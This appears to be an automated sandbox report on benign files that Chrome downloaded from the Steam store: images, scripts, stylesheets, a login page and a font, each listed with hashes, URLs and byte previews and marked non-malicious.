.nd.l......X....cs.b.),..K...Kbd...nZ..[./....F.n.....hV.*U7...=..-..L..:Tu..x[...$N.uoab..D...;..`v8...RJZ.7......E.r...o..b....,.A...C.l..G.YY.....YF,..].a....d....@$1..<,P.b,K..o....Z.X.`.<..<..R..)...V...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 27 x 21, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1283
        Entropy (8bit):6.804522396238829
        Encrypted:false
        SSDEEP:24:Iy1he91Wwjx82lY2T3ouVgy28yULyJ3Vey7uytbGKIg2NXxqa37SV:IwqQNn2xDWLJ3xXJKg2NXjK
        MD5:6FD845DB37342E49CAF9A1B3D1268EA4
        SHA1:E380BB0F718887BA15FA5A62E06C368F39095660
        SHA-256:2B5E58C85345DCB11D869C8033CA7B7EB00A15C73554A59B553045BDE1A94ABD
        SHA-512:83DBC8420F91AB206D66981D6763017169927E68545629BC22C1265A773546196A2EA67F91F95D6C0EB7035E689D4581A8BA3B3A3AC797D2AE6CA8A237BB51A6
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images//v6/icon_cluster_controls.png
        Preview:.PNG........IHDR...............%....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D0D315BC12A911E49EBED2AEC7E84312" xmpMM:DocumentID="xmp.did:D0D315BD12A911E49EBED2AEC7E84312"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0D315BA12A911E49EBED2AEC7E84312" stRef:documentID="xmp.did:D0D315BB12A911E49EBED2AEC7E84312"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......wIDATx...J.0..3...Z<..9....>......^[.=...>.{P..F/...i.5~Y'K(Im]....L3.d&)I)...|8.....B.`p..I..1>.......=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1248
        Entropy (8bit):6.644085540417408
        Encrypted:false
        SSDEEP:24:Gy1he91Wwjx82lY2T3ouVUzmyJ3V1VPGtvAG0HgD2qSAUhR/:GwqQNn2xiZJ35PlGoZ/
        MD5:E0CC340704548A0DF17F0AEA0B12C375
        SHA1:740427827904263BD2F1C27E45759F47139D4214
        SHA-256:E60E217F0E2E2866D3FB9D22AC36E37C45BB60504D8C86E40B0E7DAA0B329286
        SHA-512:0E0A0A4D85149C1FA309E54475E713945E07735E9BE59176E4DE8A0BA89987DB51B00F04E8A906E97210CCE0E0FB1B5C0921856F5C52C30890AE765DA1AFACA1
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images//v6/social/youtube_32_white.png
        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E47CA524C36111E7A7B2FDEF91BAF72A" xmpMM:DocumentID="xmp.did:E47CA525C36111E7A7B2FDEF91BAF72A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E47CA522C36111E7A7B2FDEF91BAF72A" stRef:documentID="xmp.did:E47CA523C36111E7A7B2FDEF91BAF72A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..K...TIDATx.b...?.@.&......p....FFF..`...Rb@....P..I...sA......G ..._..+..?...%...@......>x.5.....t....(.....`..@,J.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 306x260, components 3
        Category:downloaded
        Size (bytes):41851
        Entropy (8bit):7.980235903458787
        Encrypted:false
        SSDEEP:768:1cjZjGRitrtevIH5TOkY7b5omxzbaQPCylmQ6VEoVE0Xo/KIFLe+1U:y9jG0tEvIHWvUQPCylmJhVE0SKkv1U
        MD5:95EDC15685A6B8159DC3920D893831A7
        SHA1:6D3C91EE3FC8E8A5B64184EE309752E38DE7FEB4
        SHA-256:933A0BB5354C46F2EED6E90BE91BC98A89DD66D437AD483EA93F6A40051A68FB
        SHA-512:BAE48ED7D171BA16F18A046FCB02E6EA2F0E85EDEE75D2FCC83568883CA8FC3C68E58E9CD29520F3C2353F2445C2DB27235F8097D9DC63431C566D573458BF68
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/79a6119dc4ac7345b5618b04/spotlight_image_english.jpg?t=1716398173
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:EA415E2BAEA1DF11A752BC80D643D9CD" xmpMM:DocumentID="xmp.did:E049E34F185E11EF870C9CB628AC2594" xmpMM:InstanceID="xmp.iid:E049E34E185E11EF870C9CB628AC2594" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4a7860c1-9d74-964b-9b44-ffa326329aa6" stRef:documentID="adobe:docid:photoshop:21838ae6-7fbd-0a4d-82d2-a5869c55efac"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...............'...<n..e7...y...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):4010
        Entropy (8bit):7.858798553113305
        Encrypted:false
        SSDEEP:96:CE8fW7Ue59/Q3PyLZ0Mmtr50rRWTNJVNlpPn3pHU91c6CTm:CJfy55pQ3P6KMO0rMhFlNnxk1tf
        MD5:4D35C71CF57286BC9F6555CB3EE9F440
        SHA1:F4A1535333B902F4A9949C51DD3B2419C6F6AD11
        SHA-256:5A7E64DD25F1AAF5C90A638EDDCE1EC984496CC819408E22C106CA72FE2AACD3
        SHA-512:E622172608BD2206D94DCC81401788C587276FA0C16DCDDD2BA45C710945BE6DB4A963B886C60EA3D05271865097FC31BD208DA8E72C5D2FBED30E0FCAC40B7A
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/capsule_184x69.jpg?t=1715101527
        Preview:......JFIF.............C....................................................................C.......................................................................E.................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...~T.O........g4.XIedB1....../'......l...=)....l....4.;.'.....C.....}............r3.{....r.C...&.rz..P.&.1..>{U.^.A.pU........F2.o.o.Ll6.....Wp.q.&.......9...`.#..N3.4...<.`......^O...@......\t..M.......R...s.......;.39=s...27\....S.6q......f....N..e?tz.hA......@....);_....q.#.a.U..rHPH# ...km<1m.#.b.W...q....B . ..z......s..8e=h.,Px.....g.......4^.M.l.r
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (17415), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):17580
        Entropy (8bit):5.229778898464247
        Encrypted:false
        SSDEEP:192:+TJsjHO+Cu4AR/e8dGDA53c1Ip1Ap1Bp1qp1Tp10p1lp1+p1Xp14p1Gp1tp18p1A:+T2DOArJNZABqT0l+X4Gt87SJSUKyn
        MD5:EDCDF82CC4ABA1D4FDCD9813F9A378EB
        SHA1:9BE80677D93D8D5D0D8CA1494C3CB6BFD722F9B3
        SHA-256:151AB2CDE5B2F08CA90C9CD1C08AF4896ADC7C7A401CF04811E329E79AAA436B
        SHA-512:9A6B80F2BC6A151586A24E542FBFF4DB450BA7B318E6798978581632162962527AC44958B1944F6E3C27FAC30BC97403DFF9181383083DA6141A759BFD629A7E
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/6882.js?contenthash=5d95b6913c0da291e28a
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[6882],{6514:e=>{e.exports={LoadingWrapper:"_3Z36hMlC0g5rhADc86JeV8",Static:"kwzRJNhtPiQO0D4Wn0PLU",none:"_2iT5lTDKhbxllUncFnJhS0",bottomCircle:"_3-sjxBwrq1aRP-xn0Pwx37",noString:"M4pF_ij_g5aN0m2FqZc7u",Throbber:"_7MdwTzlZhzNS1NzYBn7Sk",throbber_small:"_29-XTCJVnFYwvPS6oJ6liL",throbber_medium:"_1yqSoIPxWwEa9VRtAQdhdy",throbber_large:"_1u2tLqxQCBluyLGN_QvmRf",throbber_center_wrapper:"Yi4EMhptGPt8XWnnnT_nC",ThrobberText:"_1ZlvfuG4Q4e9GfTYNuNI5b",blur:"_3ebLcY6yz7RZRSTq7EK5Lo",ThrobberRoundLoop:"_3SEk8c3qDYTigYcVaGHzE8",roundOuterOutline:"_3M8ArwlB5FKwDNDos_gbXp",roundOuter:"_3H7At8KqRfv4ttYb4hHZmf",roundFill:"_2FWWtb-RoV2eWwZb_2ZPr-",ThrobberFillLoop:"_1-rlbGjslOZcEUwLtOMFS5",topCircle:"_3znUFhu51nKns1e7TS-OBI",circlePulse:"_1oQUOQrI5F662TJKj8jekS",ThrobberTopCircleLoo
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 1057 x 453, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):134600
        Entropy (8bit):7.975500968858445
        Encrypted:false
        SSDEEP:3072:CUnFasOIVyHQCFbeIxsaFHePkAq+y0I7TMOE9A4B:DnFLOIpnYhAq+y0UMnA2
        MD5:ED96AF112AE58CC87D257E3A15A15058
        SHA1:2FB2963CA13D8E2DFF6BC71E9EAD9B0FDC686CD0
        SHA-256:FC76B07C4A37F312FF1883EFEFC994E48BFC407942ABBE823D665D46C2A883D2
        SHA-512:16ADB69862AF3C24CBF37BE97C366D441112222FB4F39938295E89CEE92344914C346F5672D146A1EDF0008EED491EB66CD91615318374A4A9E12598EE48224E
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...!................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):22286
        Entropy (8bit):7.962416922797294
        Encrypted:false
        SSDEEP:384:lMPlRerM5YogshssSm73ctW538T+UWRX+BoubEUhKcd2ZZ3Rq4ID5nah33I49S:l6ArM5fgyT73cE53RyoVUMcdYZ3Za2YD
        MD5:0AF0BF6E23A18F348EE97C8281B1DDC7
        SHA1:32AD2DC05BB0768D69DED417487B4A22D26CE59A
        SHA-256:A99A13AEADB9EDF8A34094F9EEA4A308EC9887C09A6DC56B394C62BF8D1C3ABD
        SHA-512:93115A104B217C9CF9BE09719FDED9FCE4D16AB4C183F2E7E156393B469534B945CA436C2A93049E00BD2964C4D7C1A2E4624CE8D54FAB843F1CFDF55028DBC0
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2380740/header_292x136.jpg?t=1713231545
        Preview:......JFIF.............C....................................................................C.........................................................................$.............................................E..........................!.1.."AQ.a2q..#BR...3b..$r..Cc.&d.........................................>........................!1.A.Qa"q....2.....#3B...Rbr$..4cC..............?........w..S.*:7f..+..&....9<%...G.#.R ..?.`.Q!.L..Q.*.t.....P.X.H....9I.W..H....8...e..r.+..<(..ry).59Y,./..3.\.E.l.[.=..}0.M..r..S.'..>~...;.u..1....,.R.m....l..."L....:.2^Y[....d..O..@..I.y..qs....6......Tq..;.Y.....}...'.....1..P.t.7.Q.U.8.Q...G._.....3...AvKt.J$Z.!.7.A....!.....C.._*8h..2......\.4...X..!...0I}.^m...HN..RR.pp3..........yB.2.(<.7@..k.........2......PO.5XmjO.J......L%.5......tsM($cK.w,#.......Ur.F..J.>K...zz..\i8.....ds..D...'......&yd..@%..x.P....9..NE..L...e.-)..9.. ..8....)M.")....0o..}..H....YO...i.......O.O.&].o.S.....#.r......R2G..1...,.....=...H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x77, components 3
        Category:downloaded
        Size (bytes):2904
        Entropy (8bit):7.839567999383945
        Encrypted:false
        SSDEEP:48:6uERACUc0qgCH9MCFgP7yEZpOXmhVSdI8jkOfwKKT:NEd/oCH9MnGc8KV5
        MD5:20818CCA0E5E263A92BC72405B8CFF84
        SHA1:214A2311A098C512390330C374E1EA53FBE76D20
        SHA-256:8B19A13D5B57F82E9661ADE91084B7034D64BA5F1FA757AC7DCBABCF8E493F50
        SHA-512:16A925B4C21D14798F6DC298C387C9D32DEE794C075D4AADF47381434E6AD0E2BCFDB1EAB7828F0419A4CF457803BFBA18E37B4F1E3402C45575F3A0E7094F73
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256837680/movie.184x123.jpg?t=1705420858
        Preview:......JFIF.............C....................................................................C.......................................................................M...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.R...RG...Fx.H..z../.0:....u499=....!.sQBp[9.*..;NN~...n.....a.........l...e.......9.B:.._.3V...=..8.z...n..G.[...f(.d|.<.......4w...W..7...r....Oo.. .O...Z..a5}Q.?.S\......g|.g..........2.....y....5.7.m..g.-8......o...M>...-..y_.)-&.,A.01.k+3).j'..w....%...%..,1K${.@..8..9.^[...F.Y..np...Pq.{......\......@$.s..}+....m.]..F....gh..@..Oj.Ri^..j.m.|m.$WR..*..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):48950
        Entropy (8bit):7.965922433799161
        Encrypted:false
        SSDEEP:768:9kB2EUOh8JP72sjmk2ho+6B8xP1zWzNRsRFeoThFT/W7yZ+kxEteRm0wsGS+UEg:90+PkV6wtzyNMFe+FTcCEcm7g
        MD5:68AFDACD8DE6F6ACDB1335163D3DAAD1
        SHA1:0F7B2FEE87BB2DFD43781BF69965F91822BDDC04
        SHA-256:D1366B60D10B1C4165A142AA1A30FB49F5CC7A4B89EC5D1872BF82FFB214E533
        SHA-512:E67B127AEA2A21C21902E564F1604C42D16F1148656D9A27774366451D92ACAE462E973E8AA6283941C01856DDD7220D56F34290A580B944E8BB2CB26AA0C2D1
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/ss_11409331d57966ef193d66ffcded569d02a4e034.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................J.........................!1A..Qa."q..2..#B.......$34Rbr5S.....Cst%Dc...................................8......................!.1..AQ"a.2q.......B...3.#R.$b..............?..........B..E.BPPP.@..4...).P.@....P.(((......(......(........(......(..h...P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@..I=.2.%m.@....kGa.X.P."{.../...{c...$.:8..<.WG..[h..b.0...@....!....aH...Fi....(......()....P.@....P.@..........P.@....P.@...%...P.@....P.@....P.@....P.@....P.@....P.@....P.@....P.@......%.^f.S8.).....q..@.a.@.V...;s.g$o..1.jm.<...<.........1@.#.........J.J...(......(((......(......(........(......(......@....P.@....P.@....P.@....P.@....P.@....P.@....-.A*4...y..jD........i.Y.....-.u....>....L.g.F*....r[{.h...............X./i........!@..`.:..J.z....?/l.`....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3579), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):32147
        Entropy (8bit):5.430293256016032
        Encrypted:false
        SSDEEP:768:LEhFpmHVCBdexLLLv5SpqaR+7/Hg8lTDzJtxv3ffVQjOIojIAerXsAag/qMDzJtl:LEhFpmHVCBdexLLLv5SpqaR+7/Hg8lTe
        MD5:0F167B3DB75349396C5BD1768FF944B5
        SHA1:D8D3F8450ECB211FEA7D290E8BD68E7757632ECD
        SHA-256:7DCC4DB48E36F046E5DAF638DD2A0D118B7FE4E0DEDB293022A1EAC382EE4F81
        SHA-512:52BBC46C8A2647F91466742AAEE8FE8F6B9CB6EAD1FB4EC8EC51C6F206B93402E416CD498B1AC09A2036D1983C374F35E9C1D45AE63BE7C58428FFC3B86C04F0
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/login/?redir=app%2F1643320%2FSTALKER_2_Heart_of_Chornobyl%2F%3Fcurator_clanid%3D6313&redir_ssl=1&snr=1_5_9__global-header
        Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Sign In</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://store.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=Rc2hpzg2Ex3T&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/shared/css/shared_global.css?v=2hTL2X8NwbqX&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/shared/css/buttons.css?v=CrrkDubPqLcq&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/css/v6/store.css?v=7b2ei1laGOqu&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://store.akamai.steamstatic.com/public/css/v6/c
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:downloaded
        Size (bytes):3684
        Entropy (8bit):4.780503743341751
        Encrypted:false
        SSDEEP:96:CXQSfzclE2Bc4N/waCVAh+m8CE2n1HNBRjVO2PGPLYOgzypH6YB:WQAzSE2BB9/c1CEEtoFUOgzs6YB
        MD5:B7A7E43284E2FFE806AC1BC27C1F6A87
        SHA1:E8196489E2AE99EC6EB33995B5A3E108D6E44DE0
        SHA-256:C3A7C646A1305017F22423030CB5A12ACC9F96B64013DCEF7AEB80567B542CBB
        SHA-512:757E4F382A864CAC9F975220C28586F5EA415B2E2215375C1A47E011A9190FCD15313D399007539F150A6DF0378B8F2022AC88E995693AB03A9F5656BFE40832
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="355.666px" height="89.333px" viewBox="0 0 355.666 89.333" enable-background="new 0 0 355.666 89.333"... xml:space="preserve">..<g>...<path fill="#C5C3C0" d="M44.238,0.601C21,0.601,1.963,18.519,0.154,41.29l23.71,9.803c2.009-1.374,4.436-2.179,7.047-2.179....c0.234,0,0.467,0.008,0.698,0.021l10.544-15.283c0-0.073-0.001-0.144-0.001-0.216c0-9.199,7.483-16.683,16.683-16.683....c9.199,0,16.682,7.484,16.682,16.683c0,9.199-7.483,16.684-16.682,16.684c-0.127,0-0.253-0.003-0.379-0.006l-15.038,10.73....c0.008,0.195,0.015,0.394,0.015,0.592c0,6.906-5.617,12.522-12.522,12.522c-6.061,0-11.129-4.326-12.277-10.055L1.678,56.893....c5.25,18.5
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):19030
        Entropy (8bit):7.968402945505378
        Encrypted:false
        SSDEEP:384:j6yC+0AgvGRXau/+OVMIa7XYddtIRVa5qK8w4tnBaWpt/ys:j6yC+PgvGR5/fV5ajYddtIHa5qlwEaWT
        MD5:40A3591062B747102C42872E5CF57595
        SHA1:153AC7A2207D209E5CE6BC8A63AF838FBD173D89
        SHA-256:BC3A5658ED775472C94EF92EAEB34DC11B36AE2B2AC74886AF108C51460C75B8
        SHA-512:E7DD421ACC51E314E13ADFC3291BC0109F3667BCCF4360CD81EF09C3426641CBC8FDDC8CCBC4960137A803716AFFD48DE5B34D7A0F786E6518D94D601C2F9C2B
        Malicious:false
        Reputation:low
        Preview:......JFIF.....,.,.....C....................................................................C.........................................................................$............................................I..........................!.1..AQ."a.2q...#BR.....3CSbr..$%....(4e......................................>........................!1A...Qaq...."....23r..$BRb......#C.............?....G....n>...Y.H..Ho.....bo......h.X..H..+.....$.........xI;N.....8I ........c0a..6\Y,...8....n..zy..._NN7Q\.M.....0.wo...S....I....S..v..'?.o......BXH.~..K.t..Q.rI.c.`...>cXT.yKf.......1.1..EE%(...!%.[......b...*..YX+...<.....(*.z.u....c....V...>]."@;X1....HdG.._b./..\..D..P......0.RL.R..w..... ......*.6u@...kr0*.p...K....<.]~^.........F_<RfU?....("K]..rE.~#...sJ...3."./......V.....4..h..4..T..i.y.Z.}............s.55].:yA&k..E..... *}Q.c_.W.y..2vnZ...}...A....1T.RV.C...M......aOp.L.Av...7...|..\..Ack3.?...S.%=.$.....v..C[..........&-.g......+%.].gy.B.<.....W....i%z..U.0p.-...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (28194), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):133520
        Entropy (8bit):5.852476468990748
        Encrypted:false
        SSDEEP:1536:9E5pFUgj8v3Yt+HC0J/wpQyprgaiuBYjBoKkjq1lze5oHsvLNb5O:6pb9iuyoiFsv1I
        MD5:06542F685D7CCAAE9D1ABF6BBBBDDAE4
        SHA1:BA69A2293857BD2A166DA1A2C5E1EDDA76252C38
        SHA-256:61D35C704BA5D7D8F9763448A7817C267985A43CABF410A0674B0F366EE5E8A5
        SHA-512:3BCFDD3A7B439F4EFE96130B4B842804B495CCAD516435E8787EC8B3AA967D06B8090C9F2BD7226F68EEA862B1E199B06572FF517ED2B1F073DF713690A4FAE5
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/applications/store/main.css?v=BlQvaF18yq6d&l=english
        Preview:...........html body.events_hub.v6{background-color:#171a21;font-family:"Motiva Sans",Arial,Helvetica,sans-serif}@media screen and (max-width: 400px){html body.events_hub.v6{scrollbar-width:none;-ms-overflow-style:none}html body.events_hub.v6::-webkit-scrollbar{display:none}}html body.events_hub.v6 #global_header{position:fixed;z-index:12;width:100%;box-sizing:border-box;transition:transform .15s ease-in-out}html body.events_hub.v6 .responsive_header{box-shadow:none;transition:transform .15s ease-in-out}html body.events_hub.v6 .responsive_page_template_content{padding-bottom:0}html body.events_hub.v6 ._2uHYtSBLSS1MxFonkOXr0O{flex:1;display:flex;flex-direction:column;min-height:0}html body.events_hub.v6 .perf_timing_area{position:absolute;bottom:0}body.rewards ._2uHYtSBLSS1MxFonkOXr0O{flex:1;display:flex;flex-direction:column;min-height:0}...pu9cOpUMN0Q4mmIX2WZPl{position:fixed;top:0;bottom:0;right:0;left:0;z-index:1599}._2qyBZV8YvxstXuSKiYDF19:focus{outline:none}.GreenEnvelopeMenu,.LQk
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2935
        Entropy (8bit):7.832603809472771
        Encrypted:false
        SSDEEP:48:vd/OcEc+qxEBZun2A4NKNVbp+ksSYzC0NOmA8rALS1v09d5E5xSGnAa0:vdnxE0lsKNVVp5mA8rXM9d5EKaAl
        MD5:A2E90EF2BBD1BC69A998AB0EE66D3C15
        SHA1:7EAADA3D4B738505FC0737AA4DA9C042DB6D441E
        SHA-256:A34A4F415CA6D2D6D0273C8C1B482013595F48D43C911BB450AC7CD3A5C34D5C
        SHA-512:1176A554B6A7578CE60DD4038DA90EEAEA0A4F7DACAB27DD978E667A4A515F09330691B3A0331B82A5672498C27ACF540E6A655E2A3B2C33AA6F1D32F9109ED3
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................9.........................!1A..Qq"2a......#B....34.Cr...................................,.......................!1.AQ.".2aq.#................?......9..b.,.../R.....$0..{}..FyA.....#...........E..s.e..9....i[..ZE*..<. .QI.4.....FZ5.#..O.H..T.V4.0.......T.;..[..rIqs+.Cg.=1..p.=.su+E..]..m4.2....3......=........b9<....k.M... .8..Y.F...6..,.8....TQj..n.R1,..-;.I.....uD..7a...C.W..ix.H....U.....0T...#..RDpa._4...q.du....w....... )=I4.b.:..`..P..=..m....Z|..t....'....K..#.h.Hw<...~..M.".......Q.....C.ut^.E....i...v....M..nf.+...E..eT?RZ...fu8......q...%.........r....*..N.KG;B..}.m..$r.0./.:...Q.....V.u......J\y4IR,.1i....r{./sa.jC......;.z.I4.&........h.d....w..(V.Y..'...5`+.6....8$zU..[.mU.x.......j..qui...Nh[.&Zi.{.D...FX.m$S"..4.E....*'..`..8.z
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansLight4.015;Plau;MotivaSa
        Category:downloaded
        Size (bytes):122660
        Entropy (8bit):6.047516179670634
        Encrypted:false
        SSDEEP:3072:XnN/O/ceJkGwg/MOAibD2hPfX4HYhDhudcvObkSafj9:9/O/ceJkGwg/MOAib6nX44NhIWOb8fh
        MD5:D45F521DBA72B19A4096691A165B1990
        SHA1:2A08728FBB9229ACCCBF907EFDF4091F9B9A232F
        SHA-256:6B7A3177485C193A2E80BE6269B6B12880E695A8B4349F49FCCF87F9205BADCC
        SHA-512:9262847972A50F0CF8FC4225C6E9A72DBF2C55CCBCC2A098B7F1A5BD9EA87502F3C495A0431373A3C20961439D2DAE4AF1B1DA5B9FADE670D7FCAED486831D8C
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015
